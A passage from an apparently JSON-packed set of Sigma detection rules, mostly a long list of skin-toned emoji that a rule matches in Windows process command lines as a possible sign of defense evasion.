'👱🏻‍♀️'\n            - '👱🏻'\n            - '👱🏻‍♂️'\n            - '👩🏻‍🦳'\n            - '🧑🏻‍🦳'\n            - '👨🏻‍🦳'\n            - '👩🏻‍🦲'\n            - '🧑🏻‍🦲'\n            - '👨🏻‍🦲'\n            - '🧔🏻‍♀️'\n            - '🧔🏻'\n            - '🧔🏻‍♂️'\n            - '👵🏻'\n            - '🧓🏻'\n            - '👴🏻'\n            - '👲🏻'\n            - '👳🏻‍♀️'\n            - '👳🏻'\n            - '👳🏻‍♂️'\n            - '🧕🏻'\n            - '👮🏻‍♀️'\n            - '👮🏻'\n            - '👮🏻‍♂️'\n            - '👷🏻‍♀️'\n            - '👷🏻'\n            - '👷🏻‍♂️'\n            - '💂🏻‍♀️'\n            - '💂🏻'\n            - '💂🏻‍♂️'\n            - '🕵🏻‍♀️'\n            - '🕵🏻'\n            - '🕵🏻‍♂️'\n            - '👩🏻‍⚕️'\n            - '🧑🏻‍⚕️'\n            - '👨🏻‍⚕️'\n            - '👩🏻‍🌾'\n            - '🧑🏻‍🌾'\n            - '👨🏻‍🌾'\n            - '👩🏻‍🍳'\n            - '🧑🏻‍🍳'\n            - '👨🏻‍🍳'\n            - '👩🏻‍🎓'\n            - '🧑🏻‍🎓'\n            - '👨🏻‍🎓'\n            - '👩🏻‍🎤'\n            - '🧑🏻‍🎤'\n            - '👨🏻‍🎤'\n            - '👩🏻‍🏫'\n            - '🧑🏻‍🏫'\n            - '👨🏻‍🏫'\n            - '👩🏻‍🏭'\n            - '🧑🏻‍🏭'\n            - '👨🏻‍🏭'\n            - '👩🏻‍💻'\n            - '🧑🏻‍💻'\n            - '👨🏻‍💻'\n            - '👩🏻‍💼'\n            - '🧑🏻‍💼'\n            - '👨🏻‍💼'\n            - '👩🏻‍🔧'\n            - '🧑🏻‍🔧'\n            - '👨🏻‍🔧'\n            - '👩🏻‍🔬'\n            - '🧑🏻‍🔬'\n            - '👨🏻‍🔬'\n            - '👩🏻‍🎨'\n            - '🧑🏻‍🎨'\n            - '👨🏻‍🎨'\n            - '👩🏻‍🚒'\n            - '🧑🏻‍🚒'\n            - '👨🏻‍🚒'\n            - '👩🏻‍✈️'\n            - '🧑🏻‍✈️'\n            - '👨🏻‍✈️'\n            - '👩🏻‍🚀'\n            - '🧑🏻‍🚀'\n            - '👨🏻‍🚀'\n            - '👩🏻‍⚖️'\n            - '🧑🏻‍⚖️'\n            - '👨🏻‍⚖️'\n            - '👰🏻‍♀️'\n            - '👰🏻'\n            - '👰🏻‍♂️'\n            - '🤵🏻‍♀️'\n            - '🤵🏻'\n            - '🤵🏻‍♂️'\n            - '👸🏻'\n            - '🫅🏻'\n            - '🤴🏻'\n            - '🥷🏻'\n            - '🦸🏻‍♀️'\n            - '🦸🏻'\n            - '🦸🏻‍♂️'\n            - '🦹🏻‍♀️'\n            - '🦹🏻'\n            - '🦹🏻‍♂️'\n            - '🤶🏻'\n            - '🧑🏻‍🎄'\n            - '🎅🏻'\n            - '🧙🏻‍♀️'\n            - '🧙🏻'\n            - '🧙🏻‍♂️'\n            - '🧝🏻‍♀️'\n            - '🧝🏻'\n            - '🧝🏻‍♂️'\n            - '🧛🏻‍♀️'\n            - '🧛🏻'\n            - '🧛🏻‍♂️'\n            - '🧜🏻‍♀️'\n            - '🧜🏻'\n            - '🧜🏻‍♂️'\n            - '🧚🏻‍♀️'\n            - '🧚🏻'\n            - '🧚🏻‍♂️'\n            - '👼🏻'\n            - '🤰🏻'\n            - '🫄🏻'\n            - '🫃🏻'\n            - '🤱🏻'\n            - '👩🏻‍🍼'\n            - '🧑🏻‍🍼'\n            - '👨🏻‍🍼'\n            - '🙇🏻‍♀️'\n            - '🙇🏻'\n            - '🙇🏻‍♂️'\n            - '💁🏻‍♀️'\n            - '💁🏻'\n            - '💁🏻‍♂️'\n            - '🙅🏻‍♀️'\n            - '🙅🏻'\n            - '🙅🏻‍♂️'\n            - '🙆🏻‍♀️'\n            - '🙆🏻'\n            - '🙆🏻‍♂️'\n            - '🙋🏻‍♀️'\n            - '🙋🏻'\n            - '🙋🏻‍♂️'\n            - '🧏🏻‍♀️'\n            - '🧏🏻'\n            - '🧏🏻‍♂️'\n            - '🤦🏻‍♀️'\n            - '🤦🏻'\n            - '🤦🏻‍♂️'\n            - '🤷🏻‍♀️'\n            - '🤷🏻'\n            - '🤷🏻‍♂️'\n            - '🙎🏻‍♀️'\n            - '🙎🏻'\n            - '🙎🏻‍♂️'\n            - '🙍🏻‍♀️'\n            - '🙍🏻'\n            - '🙍🏻‍♂️'\n            - '💇🏻‍♀️'\n            - '💇🏻'\n            - '💇🏻‍♂️'\n            - '💆🏻‍♀️'\n            - '💆🏻'\n            - '💆🏻‍♂️'\n            - '🧖🏻‍♀️'\n            - '🧖🏻'\n            - '🧖🏻‍♂️'\n            - '💃🏻'\n            - '🕺🏻'\n            - '🕴🏻'\n            - '👩🏻‍🦽'\n            - '🧑🏻‍🦽'\n            - '👨🏻‍🦽'\n            - '👩🏻‍🦼'\n            - '🧑🏻‍🦼'\n            - '👨🏻‍🦼'\n            - '🚶🏻‍♀️'\n            - '🚶🏻'\n            - '🚶🏻‍♂️'\n            - '👩🏻‍🦯'\n            - '🧑🏻‍🦯'\n            - '👨🏻‍🦯'\n            - '🧎🏻‍♀️'\n            - '🧎🏻'\n            - '🧎🏻‍♂️'\n            - '🏃🏻‍♀️'\n            - '🏃🏻'\n            - '🏃🏻‍♂️'\n            - '🧍🏻‍♀️'\n            - '🧍🏻'\n            - '🧍🏻‍♂️'\n            - '👭🏻'\n            - '🧑🏻‍🤝‍🧑🏻'\n            - '👬🏻'\n            - '👫🏻'\n            - '🧗🏻‍♀️'\n            - '🧗🏻'\n            - '🧗🏻‍♂️'\n            - '🏇🏻'\n            - '🏂🏻'\n            - '🏌🏻‍♀️'\n            - '🏌🏻'\n            - '🏌🏻‍♂️'\n            - '🏄🏻‍♀️'\n            - '🏄🏻'\n            - '🏄🏻‍♂️'\n            - '🚣🏻‍♀️'\n            - '🚣🏻'\n            - '🚣🏻‍♂️'\n            - '🏊🏻‍♀️'\n            - '🏊🏻'\n            - '🏊🏻‍♂️'\n            - '⛹🏻‍♀️'\n            - '⛹🏻'\n            - '⛹🏻‍♂️'\n            - '🏋🏻‍♀️'\n            - '🏋🏻'\n            - '🏋🏻‍♂️'\n            - '🚴🏻‍♀️'\n            - '🚴🏻'\n            - '🚴🏻‍♂️'\n            - '🚵🏻‍♀️'\n            - '🚵🏻'\n            - '🚵🏻‍♂️'\n            - '🤸🏻‍♀️'\n            - '🤸🏻'\n            - '🤸🏻‍♂️'\n            - '🤽🏻‍♀️'\n            - '🤽🏻'\n            - '🤽🏻‍♂️'\n            - '🤾🏻‍♀️'\n            - '🤾🏻'\n            - '🤾🏻‍♂️'\n            - '🤹🏻‍♀️'\n            - '🤹🏻'\n            - '🤹🏻‍♂️'\n            - '🧘🏻‍♀️'\n            - '🧘🏻'\n            - '🧘🏻‍♂️'\n            - '🛀🏻'\n            - '🛌🏻'\n            - '👋🏼'\n            - '🤚🏼'\n            - '🖐🏼'\n            - '✋🏼'\n            - '🖖🏼'\n            - '👌🏼'\n            - '🤌🏼'\n            - '🤏🏼'\n            - '✌🏼'\n            - '🤞🏼'\n            - '🫰🏼'\n            - '🤟🏼'\n            - '🤘🏼'\n            - '🤙🏼'\n            - '🫵🏼'\n            - '🫱🏼'\n            - '🫲🏼'\n            - '🫳🏼'\n            - '🫴🏼'\n            - '👈🏼'\n            - '👉🏼'\n            - '👆🏼'\n            - '🖕🏼'\n            - '👇🏼'\n            - '☝🏼'\n            - '👍🏼'\n            - '👎🏼'\n            - '✊🏼'\n            - '👊🏼'\n            - '🤛🏼'\n            - '🤜🏼'\n            - '👏🏼'\n            - '🫶🏼'\n            - '🙌🏼'\n            - '👐🏼'\n            - '🤲🏼'\n            - '🙏🏼'\n            - '✍🏼'\n            - '💪🏼'\n            - '🦵🏼'\n            - '🦶🏼'\n            - '👂🏼'\n            - '🦻🏼'\n            - '👃🏼'\n            - '👶🏼'\n            - '👧🏼'\n            - '🧒🏼'\n            - '👦🏼'\n            - '👩🏼'\n            - '🧑🏼'\n            - '👨🏼'\n            - '👩🏼‍🦱'\n            - '🧑🏼‍🦱'\n            - '👨🏼‍🦱'\n            - '👩🏼‍🦰'\n            - '🧑🏼‍🦰'\n            - '👨🏼‍🦰'\n            - '👱🏼‍♀️'\n            - '👱🏼'\n            - '👱🏼‍♂️'\n            - '👩🏼‍🦳'\n            - '🧑🏼‍🦳'\n            - '👨🏼‍🦳'\n            - '👩🏼‍🦲'\n            - '🧑🏼‍🦲'\n            - '👨🏼‍🦲'\n            - '🧔🏼‍♀️'\n            - '🧔🏼'\n            - '🧔🏼‍♂️'\n            - '👵🏼'\n            - '🧓🏼'\n            - '👴🏼'\n            - '👲🏼'\n            - '👳🏼‍♀️'\n            - '👳🏼'\n            - '👳🏼‍♂️'\n            - '🧕🏼'\n            - '👮🏼‍♀️'\n            - '👮🏼'\n            - '👮🏼‍♂️'\n            - '👷🏼‍♀️'\n            - '👷🏼'\n            - '👷🏼‍♂️'\n            - '💂🏼‍♀️'\n            - '💂🏼'\n            - '💂🏼‍♂️'\n            - '🕵🏼‍♀️'\n            - '🕵🏼'\n            - '🕵🏼‍♂️'\n            - '👩🏼‍⚕️'\n            - '🧑🏼‍⚕️'\n            - '👨🏼‍⚕️'\n            - '👩🏼‍🌾'\n            - '🧑🏼‍🌾'\n            - '👨🏼‍🌾'\n            - '👩🏼‍🍳'\n            - '🧑🏼‍🍳'\n            - '👨🏼‍🍳'\n            - '👩🏼‍🎓'\n            - '🧑🏼‍🎓'\n            - '👨🏼‍🎓'\n            - '👩🏼‍🎤'\n            - '🧑🏼‍🎤'\n            - '👨🏼‍🎤'\n            - '👩🏼‍🏫'\n            - '🧑🏼‍🏫'\n            - '👨🏼‍🏫'\n            - '👩🏼‍🏭'\n            - '🧑🏼‍🏭'\n            - '👨🏼‍🏭'\n            - '👩🏼‍💻'\n            - '🧑🏼‍💻'\n            - '👨🏼‍💻'\n            - '👩🏼‍💼'\n            - '🧑🏼‍💼'\n            - '👨🏼‍💼'\n            - '👩🏼‍🔧'\n            - '🧑🏼‍🔧'\n            - '👨🏼‍🔧'\n            - '👩🏼‍🔬'\n            - '🧑🏼‍🔬'\n            - '👨🏼‍🔬'\n            - '👩🏼‍🎨'\n            - '🧑🏼‍🎨'\n            - '👨🏼‍🎨'\n            - '👩🏼‍🚒'\n            - '🧑🏼‍🚒'\n            - '👨🏼‍🚒'\n            - '👩🏼‍✈️'\n            - '🧑🏼‍✈️'\n            - '👨🏼‍✈️'\n            - '👩🏼‍🚀'\n            - '🧑🏼‍🚀'\n            - '👨🏼‍🚀'\n            - '👩🏼‍⚖️'\n            - '🧑🏼‍⚖️'\n            - '👨🏼‍⚖️'\n            - '👰🏼‍♀️'\n            - '👰🏼'\n            - '👰🏼‍♂️'\n            - '🤵🏼‍♀️'\n            - '🤵🏼'\n            - '🤵🏼‍♂️'\n            - '👸🏼'\n            - '🫅🏼'\n            - '🤴🏼'\n            - '🥷🏼'\n            - '🦸🏼‍♀️'\n            - '🦸🏼'\n            - '🦸🏼‍♂️'\n            - '🦹🏼‍♀️'\n            - '🦹🏼'\n            - '🦹🏼‍♂️'\n            - '🤶🏼'\n            - '🧑🏼‍🎄'\n            - '🎅🏼'\n            - '🧙🏼‍♀️'\n            - '🧙🏼'\n            - '🧙🏼‍♂️'\n            - '🧝🏼‍♀️'\n            - '🧝🏼'\n            - '🧝🏼‍♂️'\n            - '🧛🏼‍♀️'\n            - '🧛🏼'\n            - '🧛🏼‍♂️'\n            - '🧜🏼‍♀️'\n            - '🧜🏼'\n            - '🧜🏼‍♂️'\n            - '🧚🏼‍♀️'\n            - '🧚🏼'\n            - '🧚🏼‍♂️'\n            - '👼🏼'\n            - '🤰🏼'\n            - '🫄🏼'\n            - '🫃🏼'\n            - '🤱🏼'\n            - '👩🏼‍🍼'\n            - '🧑🏼‍🍼'\n            - '👨🏼‍🍼'\n            - '🙇🏼‍♀️'\n            - '🙇🏼'\n            - '🙇🏼‍♂️'\n            - '💁🏼‍♀️'\n            - '💁🏼'\n            - '💁🏼‍♂️'\n            - '🙅🏼‍♀️'\n            - '🙅🏼'\n            - '🙅🏼‍♂️'\n            - '🙆🏼‍♀️'\n            - '🙆🏼'\n            - '🙆🏼‍♂️'\n            - '🙋🏼‍♀️'\n            - '🙋🏼'\n            - '🙋🏼‍♂️'\n            - '🧏🏼‍♀️'\n            - '🧏🏼'\n            - '🧏🏼‍♂️'\n            - '🤦🏼‍♀️'\n            - '🤦🏼'\n            - '🤦🏼‍♂️'\n            - '🤷🏼‍♀️'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_2.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2\nid: c98f2a0d-e1b8-4f76-90d3-359caf88d6b9\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '🤷🏼'\n            - '🤷🏼‍♂️'\n            - '🙎🏼‍♀️'\n            - '🙎🏼'\n            - '🙎🏼‍♂️'\n            - '🙍🏼‍♀️'\n            - '🙍🏼'\n            - '🙍🏼‍♂️'\n            - '💇🏼‍♀️'\n            - '💇🏼'\n            - '💇🏼‍♂️'\n            - '💆🏼‍♀️'\n            - '💆🏼'\n            - '💆🏼‍♂️'\n            - '🧖🏼‍♀️'\n            - '🧖🏼'\n            - '🧖🏼‍♂️'\n            - '💃🏼'\n            - '🕺🏼'\n            - '🕴🏼'\n            - '👩🏼‍🦽'\n            - '🧑🏼‍🦽'\n            - '👨🏼‍🦽'\n            - '👩🏼‍🦼'\n            - '🧑🏼‍🦼'\n            - '👨🏼‍🦼'\n            - '🚶🏼‍♀️'\n            - '🚶🏼'\n            - '🚶🏼‍♂️'\n            - '👩🏼‍🦯'\n            - '🧑🏼‍🦯'\n            - '👨🏼‍🦯'\n            - '🧎🏼‍♀️'\n            - '🧎🏼'\n            - '🧎🏼‍♂️'\n            - '🏃🏼‍♀️'\n            - '🏃🏼'\n            - '🏃🏼‍♂️'\n            - '🧍🏼‍♀️'\n            - '🧍🏼'\n            - '🧍🏼‍♂️'\n            - '👭🏼'\n            - '🧑🏼‍🤝‍🧑🏼'\n            - '👬🏼'\n            - '👫🏼'\n            - '🧗🏼‍♀️'\n            - '🧗🏼'\n            - '🧗🏼‍♂️'\n            - '🏇🏼'\n            - '🏂🏼'\n            - '🏌🏼‍♀️'\n            - '🏌🏼'\n            - '🏌🏼‍♂️'\n            - '🏄🏼‍♀️'\n            - '🏄🏼'\n            - '🏄🏼‍♂️'\n            - '🚣🏼‍♀️'\n            - '🚣🏼'\n            - '🚣🏼‍♂️'\n            - '🏊🏼‍♀️'\n            - '🏊🏼'\n            - '🏊🏼‍♂️'\n            - '⛹🏼‍♀️'\n            - '⛹🏼'\n            - '⛹🏼‍♂️'\n            - '🏋🏼‍♀️'\n            - '🏋🏼'\n            - '🏋🏼‍♂️'\n            - '🚴🏼‍♀️'\n            - '🚴🏼'\n            - '🚴🏼‍♂️'\n            - '🚵🏼‍♀️'\n            - '🚵🏼'\n            - '🚵🏼‍♂️'\n            - '🤸🏼‍♀️'\n            - '🤸🏼'\n            - '🤸🏼‍♂️'\n            - '🤽🏼‍♀️'\n            - '🤽🏼'\n            - '🤽🏼‍♂️'\n            - '🤾🏼‍♀️'\n            - '🤾🏼'\n            - '🤾🏼‍♂️'\n            - '🤹🏼‍♀️'\n            - '🤹🏼'\n            - '🤹🏼‍♂️'\n            - '🧘🏼‍♀️'\n            - '🧘🏼'\n            - '🧘🏼‍♂️'\n            - '🛀🏼'\n            - '🛌🏼'\n            - '👋🏽'\n            - '🤚🏽'\n            - '🖐🏽'\n            - '✋🏽'\n            - '🖖🏽'\n            - '👌🏽'\n            - '🤌🏽'\n            - '🤏🏽'\n            - '✌🏽'\n            - '🤞🏽'\n            - '🫰🏽'\n            - '🤟🏽'\n            - '🤘🏽'\n            - '🤙🏽'\n            - '🫵🏽'\n            - '🫱🏽'\n            - '🫲🏽'\n            - '🫳🏽'\n            - '🫴🏽'\n            - '👈🏽'\n            - '👉🏽'\n            - '👆🏽'\n            - '🖕🏽'\n            - '👇🏽'\n            - '☝🏽'\n            - '👍🏽'\n            - '👎🏽'\n            - '✊🏽'\n            - '👊🏽'\n            - '🤛🏽'\n            - '🤜🏽'\n            - '👏🏽'\n            - '🫶🏽'\n            - '🙌🏽'\n            - '👐🏽'\n            - '🤲🏽'\n            - '🙏🏽'\n            - '✍🏽'\n            - '💪🏽'\n            - '🦵🏽'\n            - '🦶🏽'\n            - '👂🏽'\n            - '🦻🏽'\n            - '👃🏽'\n            - '👶🏽'\n            - '👧🏽'\n            - '🧒🏽'\n            - '👦🏽'\n            - '👩🏽'\n            - '🧑🏽'\n            - '👨🏽'\n            - '👩🏽‍🦱'\n            - '🧑🏽‍🦱'\n            - '👨🏽‍🦱'\n            - '👩🏽‍🦰'\n            - '🧑🏽‍🦰'\n            - '👨🏽‍🦰'\n            - '👱🏽‍♀️'\n            - '👱🏽'\n            - '👱🏽‍♂️'\n            - '👩🏽‍🦳'\n            - '🧑🏽‍🦳'\n            - '👨🏽‍🦳'\n            - '👩🏽‍🦲'\n            - '🧑🏽‍🦲'\n            - '👨🏽‍🦲'\n            - '🧔🏽‍♀️'\n            - '🧔🏽'\n            - '🧔🏽‍♂️'\n            - '👵🏽'\n            - '🧓🏽'\n            - '👴🏽'\n            - '👲🏽'\n            - '👳🏽‍♀️'\n            - '👳🏽'\n            - '👳🏽‍♂️'\n            - '🧕🏽'\n            - '👮🏽‍♀️'\n            - '👮🏽'\n            - '👮🏽‍♂️'\n            - '👷🏽‍♀️'\n            - '👷🏽'\n            - '👷🏽‍♂️'\n            - '💂🏽‍♀️'\n            - '💂🏽'\n            - '💂🏽‍♂️'\n            - '🕵🏽‍♀️'\n            - '🕵🏽'\n            - '🕵🏽‍♂️'\n            - '👩🏽‍⚕️'\n            - '🧑🏽‍⚕️'\n            - '👨🏽‍⚕️'\n            - '👩🏽‍🌾'\n            - '🧑🏽‍🌾'\n            - '👨🏽‍🌾'\n            - '👩🏽‍🍳'\n            - '🧑🏽‍🍳'\n            - '👨🏽‍🍳'\n            - '👩🏽‍🎓'\n            - '🧑🏽‍🎓'\n            - '👨🏽‍🎓'\n            - '👩🏽‍🎤'\n            - '🧑🏽‍🎤'\n            - '👨🏽‍🎤'\n            - '👩🏽‍🏫'\n            - '🧑🏽‍🏫'\n            - '👨🏽‍🏫'\n            - '👩🏽‍🏭'\n            - '🧑🏽‍🏭'\n            - '👨🏽‍🏭'\n            - '👩🏽‍💻'\n            - '🧑🏽‍💻'\n            - '👨🏽‍💻'\n            - '👩🏽‍💼'\n            - '🧑🏽‍💼'\n            - '👨🏽‍💼'\n            - '👩🏽‍🔧'\n            - '🧑🏽‍🔧'\n            - '👨🏽‍🔧'\n            - '👩🏽‍🔬'\n            - '🧑🏽‍🔬'\n            - '👨🏽‍🔬'\n            - '👩🏽‍🎨'\n            - '🧑🏽‍🎨'\n            - '👨🏽‍🎨'\n            - '👩🏽‍🚒'\n            - '🧑🏽‍🚒'\n            - '👨🏽‍🚒'\n            - '👩🏽‍✈️'\n            - '🧑🏽‍✈️'\n            - '👨🏽‍✈️'\n            - '👩🏽‍🚀'\n            - '🧑🏽‍🚀'\n            - '👨🏽‍🚀'\n            - '👩🏽‍⚖️'\n            - '🧑🏽‍⚖️'\n            - '👨🏽‍⚖️'\n            - '👰🏽‍♀️'\n            - '👰🏽'\n            - '👰🏽‍♂️'\n            - '🤵🏽‍♀️'\n            - '🤵🏽'\n            - '🤵🏽‍♂️'\n            - '👸🏽'\n            - '🫅🏽'\n            - '🤴🏽'\n            - '🥷🏽'\n            - '🦸🏽‍♀️'\n            - '🦸🏽'\n            - '🦸🏽‍♂️'\n            - '🦹🏽‍♀️'\n            - '🦹🏽'\n            - '🦹🏽‍♂️'\n            - '🤶🏽'\n            - '🧑🏽‍🎄'\n            - '🎅🏽'\n            - '🧙🏽‍♀️'\n            - '🧙🏽'\n            - '🧙🏽‍♂️'\n            - '🧝🏽‍♀️'\n            - '🧝🏽'\n            - '🧝🏽‍♂️'\n            - '🧛🏽‍♀️'\n            - '🧛🏽'\n            - '🧛🏽‍♂️'\n            - '🧜🏽‍♀️'\n            - '🧜🏽'\n            - '🧜🏽‍♂️'\n            - '🧚🏽‍♀️'\n            - '🧚🏽'\n            - '🧚🏽‍♂️'\n            - '👼🏽'\n            - '🤰🏽'\n            - '🫄🏽'\n            - '🫃🏽'\n            - '🤱🏽'\n            - '👩🏽‍🍼'\n            - '🧑🏽‍🍼'\n            - '👨🏽‍🍼'\n            - '🙇🏽‍♀️'\n            - '🙇🏽'\n            - '🙇🏽‍♂️'\n            - '💁🏽‍♀️'\n            - '💁🏽'\n            - '💁🏽‍♂️'\n            - '🙅🏽‍♀️'\n            - '🙅🏽'\n            - '🙅🏽‍♂️'\n            - '🙆🏽‍♀️'\n            - '🙆🏽'\n            - '🙆🏽‍♂️'\n            - '🙋🏽‍♀️'\n            - '🙋🏽'\n            - '🙋🏽‍♂️'\n            - '🧏🏽‍♀️'\n            - '🧏🏽'\n            - '🧏🏽‍♂️'\n            - '🤦🏽‍♀️'\n            - '🤦🏽'\n            - '🤦🏽‍♂️'\n            - '🤷🏽‍♀️'\n            - '🤷🏽'\n            - '🤷🏽‍♂️'\n            - '🙎🏽‍♀️'\n            - '🙎🏽'\n            - '🙎🏽‍♂️'\n            - '🙍🏽‍♀️'\n            - '🙍🏽'\n            - '🙍🏽‍♂️'\n            - '💇🏽‍♀️'\n            - '💇🏽'\n            - '💇🏽‍♂️'\n            - '💆🏽‍♀️'\n            - '💆🏽'\n            - '💆🏽‍♂️'\n            - '🧖🏽‍♀️'\n            - '🧖🏽'\n            - '🧖🏽‍♂️'\n            - '💃🏽'\n            - '🕺🏽'\n            - '🕴🏽'\n            - '👩🏽‍🦽'\n            - '🧑🏽‍🦽'\n            - '👨🏽‍🦽'\n            - '👩🏽‍🦼'\n            - '🧑🏽‍🦼'\n            - '👨🏽‍🦼'\n            - '🚶🏽‍♀️'\n            - '🚶🏽'\n            - '🚶🏽‍♂️'\n            - '👩🏽‍🦯'\n            - '🧑🏽‍🦯'\n            - '👨🏽‍🦯'\n            - '🧎🏽‍♀️'\n            - '🧎🏽'\n            - '🧎🏽‍♂️'\n            - '🏃🏽‍♀️'\n            - '🏃🏽'\n            - '🏃🏽‍♂️'\n            - '🧍🏽‍♀️'\n            - '🧍🏽'\n            - '🧍🏽‍♂️'\n            - '👭🏽'\n            - '🧑🏽‍🤝‍🧑🏽'\n            - '👬🏽'\n            - '👫🏽'\n            - '🧗🏽‍♀️'\n            - '🧗🏽'\n            - '🧗🏽‍♂️'\n            - '🏇🏽'\n            - '🏂🏽'\n            - '🏌🏽‍♀️'\n            - '🏌🏽'\n            - '🏌🏽‍♂️'\n            - '🏄🏽‍♀️'\n            - '🏄🏽'\n            - '🏄🏽‍♂️'\n            - '🚣🏽‍♀️'\n            - '🚣🏽'\n            - '🚣🏽‍♂️'\n            - '🏊🏽‍♀️'\n            - '🏊🏽'\n            - '🏊🏽‍♂️'\n            - '⛹🏽‍♀️'\n            - '⛹🏽'\n            - '⛹🏽‍♂️'\n            - '🏋🏽‍♀️'\n            - '🏋🏽'\n            - '🏋🏽‍♂️'\n            - '🚴🏽‍♀️'\n            - '🚴🏽'\n            - '🚴🏽‍♂️'\n            - '🚵🏽‍♀️'\n            - '🚵🏽'\n            - '🚵🏽‍♂️'\n            - '🤸🏽‍♀️'\n            - '🤸🏽'\n            - '🤸🏽‍♂️'\n            - '🤽🏽‍♀️'\n            - '🤽🏽'\n            - '🤽🏽‍♂️'\n            - '🤾🏽‍♀️'\n            - '🤾🏽'\n            - '🤾🏽‍♂️'\n            - '🤹🏽‍♀️'\n            - '🤹🏽'\n            - '🤹🏽‍♂️'\n            - '🧘🏽‍♀️'\n            - '🧘🏽'\n            - '🧘🏽‍♂️'\n            - '🛀🏽'\n            - '🛌🏽'\n            - '👋🏾'\n            - '🤚🏾'\n            - '🖐🏾'\n            - '✋🏾'\n            - '🖖🏾'\n            - '👌🏾'\n            - '🤌🏾'\n            - '🤏🏾'\n            - '✌🏾'\n            - '🤞🏾'\n            - '🫰🏾'\n            - '🤟🏾'\n            - '🤘🏾'\n            - '🤙🏾'\n            - '🫵🏾'\n            - '🫱🏾'\n            - '🫲🏾'\n            - '🫳🏾'\n            - '🫴🏾'\n            - '👈🏾'\n            - '👉🏾'\n            - '👆🏾'\n            - '🖕🏾'\n            - '👇🏾'\n            - '☝🏾'\n            - '👍🏾'\n            - '👎🏾'\n            - '✊🏾'\n            - '👊🏾'\n            - '🤛🏾'\n            - '🤜🏾'\n            - '👏🏾'\n            - '🫶🏾'\n            - '🙌🏾'\n            - '👐🏾'\n            - '🤲🏾'\n            - '🙏🏾'\n            - '✍🏾'\n            - '💪🏾'\n            - '🦵🏾'\n            - '🦶🏾'\n            - '👂🏾'\n            - '🦻🏾'\n            - '👃🏾'\n            - '👶🏾'\n            - '👧🏾'\n            - '🧒🏾'\n            - '👦🏾'\n            - '👩🏾'\n            - '🧑🏾'\n            - '👨🏾'\n            - '👩🏾‍🦱'\n            - '🧑🏾‍🦱'\n            - '👨🏾‍🦱'\n            - '👩🏾‍🦰'\n            - '🧑🏾‍🦰'\n            - '👨🏾‍🦰'\n            - '👱🏾‍♀️'\n            - '👱🏾'\n            - '👱🏾‍♂️'\n            - '👩🏾‍🦳'\n            - '🧑🏾‍🦳'\n            - '👨🏾‍🦳'\n            - '👩🏾‍🦲'\n            - '🧑🏾‍🦲'\n            - '👨🏾‍🦲'\n            - '🧔🏾‍♀️'\n            - '🧔🏾'\n            - '🧔🏾‍♂️'\n            - '👵🏾'\n            - '🧓🏾'\n            - '👴🏾'\n            - '👲🏾'\n            - '👳🏾‍♀️'\n            - '👳🏾'\n            - '👳🏾‍♂️'\n            - '🧕🏾'\n            - '👮🏾‍♀️'\n            - '👮🏾'\n            - '👮🏾‍♂️'\n            - '👷🏾‍♀️'\n            - '👷🏾'\n            - '👷🏾‍♂️'\n            - '💂🏾‍♀️'\n            - '💂🏾'\n            - '💂🏾‍♂️'\n            - '🕵🏾‍♀️'\n            - '🕵🏾'\n            - '🕵🏾‍♂️'\n            - '👩🏾‍⚕️'\n            - '🧑🏾‍⚕️'\n            - '👨🏾‍⚕️'\n            - '👩🏾‍🌾'\n            - '🧑🏾‍🌾'\n            - '👨🏾‍🌾'\n            - '👩🏾‍🍳'\n            - '🧑🏾‍🍳'\n            - '👨🏾‍🍳'\n            - '👩🏾‍🎓'\n            - '🧑🏾‍🎓'\n            - '👨🏾‍🎓'\n            - '👩🏾‍🎤'\n            - '🧑🏾‍🎤'\n            - '👨🏾‍🎤'\n            - '👩🏾‍🏫'\n            - '🧑🏾‍🏫'\n            - '👨🏾‍🏫'\n            - '👩🏾‍🏭'\n            - '🧑🏾‍🏭'\n            - '👨🏾‍🏭'\n            - '👩🏾‍💻'\n            - '🧑🏾‍💻'\n            - '👨🏾‍💻'\n            - '👩🏾‍💼'\n            - '🧑🏾‍💼'\n            - '👨🏾‍💼'\n            - '👩🏾‍🔧'\n            - '🧑🏾‍🔧'\n            - '👨🏾‍🔧'\n            - '👩🏾‍🔬'\n            - '🧑🏾‍🔬'\n            - '👨🏾‍🔬'\n            - '👩🏾‍🎨'\n            - '🧑🏾‍🎨'\n            - '👨🏾‍🎨'\n            - '👩🏾‍🚒'\n            - '🧑🏾‍🚒'\n            - '👨🏾‍🚒'\n            - '👩🏾‍✈️'\n            - '🧑🏾‍✈️'\n            - '👨🏾‍✈️'\n            - '👩🏾‍🚀'\n            - '🧑🏾‍🚀'\n            - '👨🏾‍🚀'\n            - '👩🏾‍⚖️'\n            - '🧑🏾‍⚖️'\n            - '👨🏾‍⚖️'\n            - '👰🏾‍♀️'\n            - '👰🏾'\n            - '👰🏾‍♂️'\n            - '🤵🏾‍♀️'\n            - '🤵🏾'\n            - '🤵🏾‍♂️'\n            - '👸🏾'\n            - '🫅🏾'\n            - '🤴🏾'\n            - '🥷🏾'\n            - '🦸🏾‍♀️'\n            - '🦸🏾'\n            - '🦸🏾‍♂️'\n            - '🦹🏾‍♀️'\n            - '🦹🏾'\n            - '🦹🏾‍♂️'\n            - '🤶🏾'\n            - '🧑🏾‍🎄'\n            - '🎅🏾'\n            - '🧙🏾‍♀️'\n            - '🧙🏾'\n            - '🧙🏾‍♂️'\n            - '🧝🏾‍♀️'\n            - '🧝🏾'\n            - '🧝🏾‍♂️'\n            - '🧛🏾‍♀️'\n            - '🧛🏾'\n            - '🧛🏾‍♂️'\n            - '🧜🏾‍♀️'\n            - '🧜🏾'\n            - '🧜🏾‍♂️'\n            - '🧚🏾‍♀️'\n            - '🧚🏾'\n            - '🧚🏾‍♂️'\n            - '👼🏾'\n            - '🤰🏾'\n            - '🫄🏾'\n            - '🫃🏾'\n            - '🤱🏾'\n            - '👩🏾‍🍼'\n            - '🧑🏾‍🍼'\n            - '👨🏾‍🍼'\n            - '🙇🏾‍♀️'\n            - '🙇🏾'\n            - '🙇🏾‍♂️'\n            - '💁🏾‍♀️'\n            - '💁🏾'\n            - '💁🏾‍♂️'\n            - 